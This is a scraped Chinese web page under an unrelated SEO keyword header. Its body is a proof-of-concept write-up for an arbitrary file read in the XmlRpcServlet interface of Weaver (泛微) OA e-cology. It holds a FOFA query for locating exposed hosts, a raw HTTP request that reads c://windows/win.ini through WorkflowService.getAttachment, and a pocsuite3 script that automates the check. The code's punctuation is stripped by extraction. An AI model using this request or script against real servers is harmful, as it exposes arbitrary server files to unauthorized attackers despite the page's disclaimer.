当前位置：首页 > news >正文

站长工具网站提交长沙人才招聘网最新招聘2022

news 2025/10/18 19:06:47

站长工具网站提交,长沙人才招聘网最新招聘2022,公司网站建设技术方案,二手物品交换网站建设免责声明文章中涉及的漏洞均已修复#xff0c;敏感信息均已做打码处理#xff0c;文章仅做经验分享用途#xff0c;切勿当真#xff0c;未授权的攻击属于非法行为#xff01;文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的…免责声明文章中涉及的漏洞均已修复敏感信息均已做打码处理文章仅做经验分享用途切勿当真未授权的攻击属于非法行为文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任一旦造成后果请自行负责漏洞描述该系统 xmlrpcServlet接口存在任意文件读取漏洞攻击者通过此漏洞可读取服务器上任意文件。 fofa语句 app泛微-OAe-cology poc加检测 POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1 Host: Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8?xml version1.0 encodingUTF-8?methodCallmethodNameWorkflowService.getAttachment/methodNameparamsparamvaluestringc://windows/win.ini/string/value/param/params/methodCall 读取文件后使用base64解码 poc脚本脚本使用pocsuite框架 # _*_ coding:utf-8 _*_ # Time : 2023/12/25 # Author: 炼金术师诸葛亮 from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD, random_strclass fanweiOA_xml_fileread(POCBase):pocDesc 泛微OA xmlrpcServlet接口任意文件读取漏洞author 炼金术师诸葛亮createDate 2023-12-25name 泛微OA xmlrpcServlet接口任意文件读取漏洞def _verify(self):result {}url self.url /weaver/org.apache.xmlrpc.webserver.XmlRpcServletheaders {User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0,Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8,Accept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3,Accept-Encoding: gzip, deflate,DNT: 1,Connection: close,Upgrade-Insecure-Requests: 1,Content-Type: application/x-www-form-urlencoded}data ?xml version1.0 encodingUTF-8?methodCallmethodNameWorkflowService.getAttachment/methodNameparamsparamvaluestringc://windows/win.ini/string/value/param/params/methodCalltry:response requests.post(url, headersheaders,datadata,verifyFalse)text response.textif response.status_code 200 and Oy in text:result[VerifyInfo] {}return self.parse_output(result)except Exception as e:passregister_poc(fanweiOA_xml_fileread) 脚本利用

查看全文

http://www.tj-hxxt.cn/news/229116.html